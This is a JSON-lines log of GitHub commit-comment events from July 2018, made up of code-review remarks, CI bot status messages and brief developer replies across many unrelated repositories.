{"id":"7942186749","type":"CommitCommentEvent","actor":{"login":"cdemulde"},"repo":{"name":"UGentBiomath/wwdata"},"payload":{"comment":{"id":29652443,"position":38,"line":1579,"path":"wwdata/Class_HydroData.py","commit_id":"fc1d464bcceaf37fc3b2fcff1f4c51247f9a9a4a","created_at":"2018-07-10T08:18:13Z","updated_at":"2018-07-10T08:18:13Z","author_association":"MEMBER","body":"This message might be a bit too confusing for the user: (s)he is asking to detect drift, but the message doesn't say anything about that. Maybe something like 'Based on the specified maximum slope, a drift was detected with a slope higher than the maximum one'."}},"created_at":"2018-07-10T08:18:13Z"}
{"id":"7942189167","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/migrating-build-logic-from-groovy-to-kotlin"},"payload":{"comment":{"id":29652449,"position":391,"line":782,"path":"contents/index.adoc","commit_id":"f7786b7469341f99f9cd39aad43659d67d268d98","created_at":"2018-07-10T08:18:39Z","updated_at":"2018-07-10T08:18:39Z","author_association":"MEMBER","body":"OK, thanks for confirming."}},"created_at":"2018-07-10T08:18:39Z"}
{"id":"7942190957","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/AdmiralFox"},"payload":{"comment":{"id":29652452,"position":9,"line":9,"path":"week-08/day-5/src/main/java/com/greenfoxacademy/thereddit/models/TheReddit.java","commit_id":"431e72e9ba6f6afa8cd272b3754ad8b6a1e9b7c5","created_at":"2018-07-10T08:18:58Z","updated_at":"2018-07-10T08:18:58Z","author_association":"NONE","body":"As far as I can see you put the \"theReddit\" everywhere. It is the name of the project, there is a `TheRedditService`, `TheRedditController` and the model is simply `TheReddit`? Unfortunately this naming is confusing :( I would name this entity as `Post` and the controller would be `MainController` / `PostController`. If I would have 2 models, for example `Post` and `User` I would use the models name to specify the repository,service,controller (UserRepo, UserService, UserController)"}},"created_at":"2018-07-10T08:18:58Z"}
{"id":"7942193919","type":"CommitCommentEvent","actor":{"login":"cdemulde"},"repo":{"name":"UGentBiomath/wwdata"},"payload":{"comment":{"id":29652464,"position":45,"line":1581,"path":"wwdata/Class_HydroData.py","commit_id":"fc1d464bcceaf37fc3b2fcff1f4c51247f9a9a4a","created_at":"2018-07-10T08:19:32Z","updated_at":"2018-07-10T08:19:32Z","author_association":"MEMBER","body":"For this you can just add a boolean plot argument like in several other functions. \r\n```\r\nif plot:\r\n   plot the original and detrended signal\r\n```"}},"created_at":"2018-07-10T08:19:32Z"}
{"id":"7942196871","type":"CommitCommentEvent","actor":{"login":"ALBALTAR"},"repo":{"name":"ALBALTAR/sample-cloud-native-toolchain-tutorial-20180709102344676"},"payload":{"comment":{"id":29652466,"position":null,"line":null,"path":null,"commit_id":"6ac6ea7a2fd8f142411ace846e28e2d18654e2a4","created_at":"2018-07-10T08:20:08Z","updated_at":"2018-07-10T08:20:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8e8ef148-d19e-476e-b685-be6326313283?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709102344676\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3caa3ff9-64f5-4d69-8aba-3da7811f3e37?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709102344676\") deployed [sample-cloud-native-toolchain-tutorial-20180709102344676](https://github.com/ALBALTAR/sample-cloud-native-toolchain-tutorial-20180709102344676/releases/tag/deploy-ibm-yp-us-south-alberto.baltar-test-20180710-082007 \"deploy-ibm-yp-us-south-alberto.baltar-test-20180710-082007\") to [test](https://console.bluemix.net/apps/002b0fdd-d1f5-45fe-8c03-b3713e261ce1?env_id=ibm:yp:us-south \"ibm:yp:us-south:alberto.baltar:test\"), including this commit"}},"created_at":"2018-07-10T08:20:08Z"}
{"id":"7942200909","type":"CommitCommentEvent","actor":{"login":"richardbarlow"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29652473,"position":13,"line":13,"path":"annual-robotics-competition/money-matters.md","commit_id":"c8f282ea67e0d21b8eee559a287093e3f74d8af2","created_at":"2018-07-10T08:20:50Z","updated_at":"2018-07-10T08:20:50Z","author_association":"CONTRIBUTOR","body":"The intention is changes over £1000. So for example if there was a line of £25000 and £2000 of it was moved to another line/lines. Ultimately it's quite hard to define this without there always being holes (e.g. one could just make lots of £999 reallocations) so there is a level of trust involved that the spirit of this is followed."}},"created_at":"2018-07-10T08:20:50Z"}
{"id":"7942201379","type":"CommitCommentEvent","actor":{"login":"nicolactic"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29652475,"position":null,"line":null,"path":null,"commit_id":"06b91d366e326eaafb48c040b1cf8d485ce2ece1","created_at":"2018-07-10T08:20:56Z","updated_at":"2018-07-10T08:20:56Z","author_association":"COLLABORATOR","body":"Smash that star button"}},"created_at":"2018-07-10T08:20:56Z"}
{"id":"7942201703","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29652477,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T08:21:00Z","updated_at":"2018-07-10T08:21:00Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-10T08:21:00Z"}
{"id":"7942202452","type":"CommitCommentEvent","actor":{"login":"richardbarlow"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29652480,"position":13,"line":13,"path":"annual-robotics-competition/money-matters.md","commit_id":"c8f282ea67e0d21b8eee559a287093e3f74d8af2","created_at":"2018-07-10T08:21:10Z","updated_at":"2018-07-10T08:21:10Z","author_association":"CONTRIBUTOR","body":"I will try to reword it so that it sounds less ambiguous."}},"created_at":"2018-07-10T08:21:10Z"}
{"id":"7942203705","type":"CommitCommentEvent","actor":{"login":"awakening95"},"repo":{"name":"awakening95/sum_test"},"payload":{"comment":{"id":29652484,"position":null,"line":null,"path":null,"commit_id":"6ac3a7afa68c21f002e0519afdd239c3926a5350","created_at":"2018-07-10T08:21:23Z","updated_at":"2018-07-10T08:21:23Z","author_association":"OWNER","body":"6ac3a7afa68c21f002e0519afdd239c3926a5350"}},"created_at":"2018-07-10T08:21:23Z"}
{"id":"7942204234","type":"CommitCommentEvent","actor":{"login":"jbbr"},"repo":{"name":"nuwave/lighthouse"},"payload":{"comment":{"id":29652486,"position":8,"line":8,"path":"assets/default-schema.graphql","commit_id":"c90df6ac587c6269fafa4a4b056fc0f261ec9b8d","created_at":"2018-07-10T08:21:30Z","updated_at":"2018-07-10T08:21:30Z","author_association":"NONE","body":"Is there a specific reason why you not rely on native GraphQLs required fields? Or is it just personal preference?\r\ne.g \r\n```graphql\r\n(\r\n  name: String!\r\n  email: String! @rules(apply: [\"email\", \"...\"]_\r\n)\r\n```"}},"created_at":"2018-07-10T08:21:30Z"}
{"id":"7942208019","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29652493,"position":null,"line":null,"path":null,"commit_id":"3c5ba567a4b2388004b1a55f57769980414ef6b9","created_at":"2018-07-10T08:22:14Z","updated_at":"2018-07-10T08:22:14Z","author_association":"NONE","body":"хороший код\r\nрубокоп почти не ругается )\r\n\r\nчтобы сделать код еще лучше и уменьшить количество претензий рубокопа можно предпринять следующие шаги  в классе Интерфейс (основные претензии и не безосновательные у рубокопа именно к нему):\r\n - из методов \"мейн меню\", \"меню криэйт\", \"меню роут\", \"меню трейн\" и т.д. вытащить первые строчки методов (набор путсов) либо в отдельные методы здесь же... либо в методы в модуле / модулях (к примеру у тебя есть чудесный модуль Мессадж)\r\n-  еще в этих же методах (во всех) есть одинаковый код:\r\n    ```ruby\r\n      break if input == 9\r\n    ```\r\n    с учетом, что все остальные вводы отрабатываются через `case...when` было бы логично и этот вариант занести туда же )) а почему он у тебя отдельно ?\r\n- в методе \"нью вагон\" я бы порекомендовал в ветках \"иф элса\"  сделать вызовы методов, вместо непосредственного кода по созданию вагонов\r\n- методе \"сидс\" неиспользуемая переменная `c` )))\r\n\r\n"}},"created_at":"2018-07-10T08:22:14Z"}
{"id":"7942208028","type":"CommitCommentEvent","actor":{"login":"denderek"},"repo":{"name":"st33f/smurry"},"payload":{"comment":{"id":29652494,"position":2,"line":2,"path":"README.md","commit_id":"8c02a0f8d0a33aada472e9392a8eccfb1500ff3f","created_at":"2018-07-10T08:22:14Z","updated_at":"2018-07-10T08:22:14Z","author_association":"NONE","body":"Let's do this! 👍 "}},"created_at":"2018-07-10T08:22:14Z"}
{"id":"7942209151","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29652496,"position":null,"line":null,"path":null,"commit_id":"c6dc58edce84339abab50996bfc3dab97d7bc406","created_at":"2018-07-10T08:22:25Z","updated_at":"2018-07-10T08:22:25Z","author_association":"CONTRIBUTOR","body":"Is the new license text going to be the same GPLv2 that was in the LICENSE file? :smile:"}},"created_at":"2018-07-10T08:22:25Z"}
{"id":"7942209276","type":"CommitCommentEvent","actor":{"login":"richardbarlow"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29652497,"position":49,"line":49,"path":"annual-robotics-competition/core-team.md","commit_id":"c8f282ea67e0d21b8eee559a287093e3f74d8af2","created_at":"2018-07-10T08:22:26Z","updated_at":"2018-07-10T08:22:26Z","author_association":"CONTRIBUTOR","body":"Right now that is probably how it will work. However, this is only due to the fact that we have not yet had chance to fully look into the data protection aspects of this. At some point the intention is to change how this dataset works (in an updated ops manual) that allows for more flexibility."}},"created_at":"2018-07-10T08:22:26Z"}
{"id":"7942243298","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29652568,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-10T08:28:51Z","updated_at":"2018-07-10T08:28:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T08:28:51Z"}
{"id":"7942244176","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29652571,"position":null,"line":null,"path":null,"commit_id":"4dc59edd4e8a1412a476c21f4731f80df9b06c2d","created_at":"2018-07-10T08:29:01Z","updated_at":"2018-07-10T08:29:01Z","author_association":"COLLABORATOR","body":"hope this merge branch master thing is ok. Ii don't normally get this, but something weird was happening with QT or github "}},"created_at":"2018-07-10T08:29:01Z"}
{"id":"7942250636","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29652582,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T08:30:13Z","updated_at":"2018-07-10T08:30:13Z","author_association":"NONE","body":"Just tested it without changes on (505  and 506 in Lua) and it seems to work fine with other types if UnitID."}},"created_at":"2018-07-10T08:30:13Z"}
{"id":"7942250989","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/AdmiralFox"},"payload":{"comment":{"id":29652587,"position":21,"line":21,"path":"week-08/day-5/src/main/java/com/greenfoxacademy/thereddit/services/TheRedditService.java","commit_id":"f788289c91c9870290d5b2131ea9cfa37f67f48e","created_at":"2018-07-10T08:30:17Z","updated_at":"2018-07-10T08:30:17Z","author_association":"NONE","body":"I'm glad that you find this `get()` method on the optional result, but unfortunately you broke the style-guide trough wrong indentation."}},"created_at":"2018-07-10T08:30:17Z"}
{"id":"7942253399","type":"CommitCommentEvent","actor":{"login":"popokatapepel"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":29652591,"position":14,"line":39,"path":"docs/client.rst","commit_id":"95986a6989af91d563a83a779bc6dfdad39a3b6d","created_at":"2018-07-10T08:30:42Z","updated_at":"2018-07-10T08:30:42Z","author_association":"NONE","body":"Setting(strict=False, xml_huge_tree=True) \r\nshould be \r\nSettings(strict=False, xml_huge_tree=True)"}},"created_at":"2018-07-10T08:30:42Z"}
{"id":"7942256250","type":"CommitCommentEvent","actor":{"login":"niklasl"},"repo":{"name":"libris/definitions"},"payload":{"comment":{"id":29652598,"position":null,"line":null,"path":null,"commit_id":"e26b474678c71eeeb6f46147d83b1ed6e1d8dae5","created_at":"2018-07-10T08:31:13Z","updated_at":"2018-07-10T08:31:13Z","author_association":"MEMBER","body":"This makes me wonder if Identity should not be the base class of Concept (since that includes all \"Enums\"), but instead of these specific classes (and perhaps some more). Or if we need \"Intangible\" above Concept, to exclude \"instrumental\" enums from the Concept/Identity-tree."}},"created_at":"2018-07-10T08:31:13Z"}
{"id":"7942258057","type":"CommitCommentEvent","actor":{"login":"pr3ssh"},"repo":{"name":"ciecode/tipi-frontend"},"payload":{"comment":{"id":29652606,"position":null,"line":null,"path":null,"commit_id":"ece01ee7188f60324388320e2a5f1c5cbebdd5ce","created_at":"2018-07-10T08:31:31Z","updated_at":"2018-07-10T08:31:31Z","author_association":"MEMBER","body":"@dacmail :clap: "}},"created_at":"2018-07-10T08:31:31Z"}
{"id":"7942263035","type":"CommitCommentEvent","actor":{"login":"Ma27"},"repo":{"name":"mayflower/nixpkgs"},"payload":{"comment":{"id":29652614,"position":null,"line":null,"path":null,"commit_id":"c6bc13cf4b8fcf3f2fc173e4581813f0c3433afa","created_at":"2018-07-10T08:32:25Z","updated_at":"2018-07-10T08:32:25Z","author_association":"MEMBER","body":"just tested this module locally (and the basic functionality of nextcloud) and it works like a charm! :)"}},"created_at":"2018-07-10T08:32:25Z"}
{"id":"7942263772","type":"CommitCommentEvent","actor":{"login":"richardbarlow"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29652616,"position":13,"line":13,"path":"annual-robotics-competition/money-matters.md","commit_id":"c8f282ea67e0d21b8eee559a287093e3f74d8af2","created_at":"2018-07-10T08:32:34Z","updated_at":"2018-07-10T08:32:34Z","author_association":"CONTRIBUTOR","body":"I think I've made this a bit clearer now. You can view the published 'in development' version (master) here: https://srobo.gitbook.io/ops-manual/v/master/"}},"created_at":"2018-07-10T08:32:34Z"}
{"id":"7942281898","type":"CommitCommentEvent","actor":{"login":"viktorgullmark"},"repo":{"name":"viktorgullmark/exile-party"},"payload":{"comment":{"id":29652654,"position":null,"line":null,"path":null,"commit_id":"1d62cd49ba70e66d3902bcafe723542e76226078","created_at":"2018-07-10T08:36:06Z","updated_at":"2018-07-10T08:36:06Z","author_association":"OWNER","body":"You're welcome, will announce it in discord when it's released. We're working on a larger update atm so will probably take a day or two for this to be live."}},"created_at":"2018-07-10T08:36:06Z"}
{"id":"7942292523","type":"CommitCommentEvent","actor":{"login":"zealotek"},"repo":{"name":"zhouquanbiao1991/weekend"},"payload":{"comment":{"id":29652672,"position":null,"line":null,"path":null,"commit_id":"e80a34ec34d7def113eff84c8cbfdcda6b364fdb","created_at":"2018-07-10T08:38:02Z","updated_at":"2018-07-10T08:38:02Z","author_association":"COLLABORATOR","body":"test !!"}},"created_at":"2018-07-10T08:38:02Z"}
{"id":"7942298586","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29652687,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T08:39:11Z","updated_at":"2018-07-10T08:39:11Z","author_association":"NONE","body":"\n账号名：ge3dsnzygyge。截屏我可能需要迟些发。你的邮箱是多少？\n\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\nOn 07/10/2018 16:28, vrlink wrote: 要不你把你的帐号名和资源管理页面的截屏发过来，看看是什么问题。\ncontact@eosvr.io\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@vrlink on b624c8a: 要不你把你的帐号名和资源管理页面的截屏发过来，看看是什么问题。\\r\\ncontact@eosvr.io\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29652559\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29652559\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29652559\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-10T08:39:11Z"}
{"id":"7942300705","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/ronai22"},"payload":{"comment":{"id":29652694,"position":6,"line":6,"path":"week-08/day-05/new-reddit/src/main/java/com/greenfoxacademy/newreddit/models/Post.java","commit_id":"c1820e29d6b9f52ebe1435a1510a478486a5c319","created_at":"2018-07-10T08:39:34Z","updated_at":"2018-07-10T08:39:34Z","author_association":"NONE","body":"I would be perfect 👍 , but unfortunately there are additional empty lines between import without any noticeable reasons. If there would be `static` import then a separator would be fine between statics and non statics, but now there isn't any."}},"created_at":"2018-07-10T08:39:34Z"}
{"id":"7942302108","type":"CommitCommentEvent","actor":{"login":"spawnia"},"repo":{"name":"nuwave/lighthouse"},"payload":{"comment":{"id":29652698,"position":8,"line":8,"path":"assets/default-schema.graphql","commit_id":"c90df6ac587c6269fafa4a4b056fc0f261ec9b8d","created_at":"2018-07-10T08:39:50Z","updated_at":"2018-07-10T08:39:50Z","author_association":"COLLABORATOR","body":"The underlying GraphQL implementation validates required fields and throws an error, before the Query can even reach our validation."}},"created_at":"2018-07-10T08:39:50Z"}
{"id":"7942303331","type":"CommitCommentEvent","actor":{"login":"robbyoung"},"repo":{"name":"robbyoung/HabbajetAngular"},"payload":{"comment":{"id":29652699,"position":null,"line":null,"path":null,"commit_id":"8801f32d8cb36ab132aaa218428facfd6f4e847a","created_at":"2018-07-10T08:40:03Z","updated_at":"2018-07-10T08:40:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Dynamic Habbajet Value](https://trello.com/c/D43AvaUO/47-dynamic-habbajet-value)"}},"created_at":"2018-07-10T08:40:03Z"}
{"id":"7942305838","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29652701,"position":17,"line":17,"path":"Lesson 3/Station.rb","commit_id":"58a682999ff73f8ebd4cd51b4559e6725ddaa4f7","created_at":"2018-07-10T08:40:31Z","updated_at":"2018-07-10T08:40:31Z","author_association":"OWNER","body":"а если будет train_arrival / train_departure ?"}},"created_at":"2018-07-10T08:40:31Z"}
{"id":"7942324365","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/ronai22"},"payload":{"comment":{"id":29652730,"position":11,"line":11,"path":"week-08/day-05/new-reddit/src/main/java/com/greenfoxacademy/newreddit/repositories/PostRepository.java","commit_id":"7849c09993ff7bd4a306b53dbee29fbc411f1256","created_at":"2018-07-10T08:43:47Z","updated_at":"2018-07-10T08:43:47Z","author_association":"NONE","body":"Yes, it is solve your problem, but I recommend to you to check the `optional` result of this method. There many useful methods that would solve your problem without overriding."}},"created_at":"2018-07-10T08:43:47Z"}
{"id":"7942324957","type":"CommitCommentEvent","actor":{"login":"olssonm"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29652731,"position":null,"line":null,"path":null,"commit_id":"e8282f5f2c0c47ce012c1423880927be44ec0cef","created_at":"2018-07-10T08:43:53Z","updated_at":"2018-07-10T08:43:53Z","author_association":"CONTRIBUTOR","body":"Yes, with the current setup only `.`, `-` and `_` are allowed. \r\n\r\nFor instance:\r\n\r\n```\r\nmix.versionHash({\r\n  length: 6,\r\n  delimiter: 'xxx'\r\n});\r\n```\r\n\r\nWould give this mix-manifest-file:\r\n\r\n```\r\n{\r\n  \".js\": \"/js/app74e694.js\",\r\n  \".css\": \"/css/app155332.css\"\r\n}\r\n```\r\n\r\nWhile \r\n\r\n```\r\nmix.versionHash({\r\n  length: 6,\r\n  delimiter: '-'\r\n});\r\n```\r\n\r\nResults in the mix-manifest (which is correct):\r\n\r\n```\r\n{\r\n  \"/js/app.js\": \"/js/app-9ff1f1.js\",\r\n  \"/css/app.css\": \"/css/app-155332.css\"\r\n}\r\n```\r\n\r\nMy previous solution handled all characters, and inserted an escaped for the special-characters (as we discussed previously). Your solution is prettier, but only handles special-characters."}},"created_at":"2018-07-10T08:43:53Z"}
{"id":"7942328127","type":"CommitCommentEvent","actor":{"login":"dyusuf"},"repo":{"name":"bornabesic/cytokine-graph-db"},"payload":{"comment":{"id":29652739,"position":null,"line":null,"path":null,"commit_id":"97a8bde08473d19ff2dbbfda82ae39c2e9b3146c","created_at":"2018-07-10T08:44:30Z","updated_at":"2018-07-10T08:44:30Z","author_association":"COLLABORATOR","body":"You are right in regards to the requirement of direction.\r\n\r\nMaybe one arbitrary direction would do as suggested here,\r\n\r\nhttps://dzone.com/articles/modelling-data-neo4j\r\n"}},"created_at":"2018-07-10T08:44:30Z"}
{"id":"7942333566","type":"CommitCommentEvent","actor":{"login":"FyF1k"},"repo":{"name":"CoolStartup/StartupIdeas"},"payload":{"comment":{"id":29652749,"position":null,"line":null,"path":null,"commit_id":"88264fd65cb1d01e6e8d5a22a646ab09643e390b","created_at":"2018-07-10T08:45:30Z","updated_at":"2018-07-10T08:45:30Z","author_association":"NONE","body":"KRASIVO"}},"created_at":"2018-07-10T08:45:30Z"}
{"id":"7942336590","type":"CommitCommentEvent","actor":{"login":"KovtunDaria"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29652753,"position":null,"line":null,"path":null,"commit_id":"9d8c3d94e756af1afb1a501025d846d69339851b","created_at":"2018-07-10T08:46:02Z","updated_at":"2018-07-10T08:46:02Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Подключить библиотеку Bootstrap](https://trello.com/c/SKFgc3nq/31-%D0%BF%D0%BE%D0%B4%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C-%D0%B1%D0%B8%D0%B1%D0%BB%D0%B8%D0%BE%D1%82%D0%B5%D0%BA%D1%83-bootstrap)"}},"created_at":"2018-07-10T08:46:02Z"}
{"id":"7942339523","type":"CommitCommentEvent","actor":{"login":"thomasmari"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29652757,"position":null,"line":null,"path":null,"commit_id":"f56a094b3b3b82f2ea9e264d050c524937a01f5d","created_at":"2018-07-10T08:46:35Z","updated_at":"2018-07-10T08:46:35Z","author_association":"OWNER","body":"Okay!!!!!!!!!!!!!! I see it now, I didn't really considere the preset of TrejWithReset. The new model (from yesterday) should be fine. I've lauched computation last night but the ph computation aren't that great for eps=1E-10 and k>500 the dynamic computation don't converge within 100 000 000 iteration (hybrid) and the minimum distance you get is 1E-2 which is really bad. Do you think the  Model/benchmark/devel/firstRejuvenation/firstRejuvenation_CTMC.pm is correct ?"}},"created_at":"2018-07-10T08:46:35Z"}
{"id":"7942348666","type":"CommitCommentEvent","actor":{"login":"sknopper"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29652770,"position":31,"line":31,"path":"src/classes/BpiFilteredDashboardCtrl.cls","commit_id":"eef617c3d9a6bfdf6f73a836a2cd1f686f22f8e0","created_at":"2018-07-10T08:48:19Z","updated_at":"2018-07-10T08:48:19Z","author_association":"NONE","body":"White space before : ? "}},"created_at":"2018-07-10T08:48:19Z"}
{"id":"7942349261","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29652772,"position":null,"line":null,"path":null,"commit_id":"ce0b6f4b0d0d13128e80642bf44860ea619e5980","created_at":"2018-07-10T08:48:25Z","updated_at":"2018-07-10T08:48:25Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `00d881e6-841e-11e8-892d-54ebf35f2722`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T08:48:25Z"}
{"id":"7942349721","type":"CommitCommentEvent","actor":{"login":"Evansmkamau"},"repo":{"name":"murinewt/WebMubet"},"payload":{"comment":{"id":29652775,"position":null,"line":null,"path":null,"commit_id":"3bee344ddc38180a05554b38392e682ee36b3ed2","created_at":"2018-07-10T08:48:31Z","updated_at":"2018-07-10T08:48:31Z","author_association":"NONE","body":"Sasa hii ni nini?"}},"created_at":"2018-07-10T08:48:31Z"}
{"id":"7942351677","type":"CommitCommentEvent","actor":{"login":"klngwll"},"repo":{"name":"libris/definitions"},"payload":{"comment":{"id":29652782,"position":null,"line":null,"path":null,"commit_id":"e26b474678c71eeeb6f46147d83b1ed6e1d8dae5","created_at":"2018-07-10T08:48:51Z","updated_at":"2018-07-10T08:48:51Z","author_association":"CONTRIBUTOR","body":"Here you had the perfect opportunity to use nebulous ;)"}},"created_at":"2018-07-10T08:48:51Z"}
{"id":"7942352106","type":"CommitCommentEvent","actor":{"login":"Evansmkamau"},"repo":{"name":"murinewt/WebMubet"},"payload":{"comment":{"id":29652783,"position":null,"line":null,"path":null,"commit_id":"3bee344ddc38180a05554b38392e682ee36b3ed2","created_at":"2018-07-10T08:48:56Z","updated_at":"2018-07-10T08:48:56Z","author_association":"NONE","body":"How can I add you as a reviewer of my pull requests?\r\n"}},"created_at":"2018-07-10T08:48:56Z"}
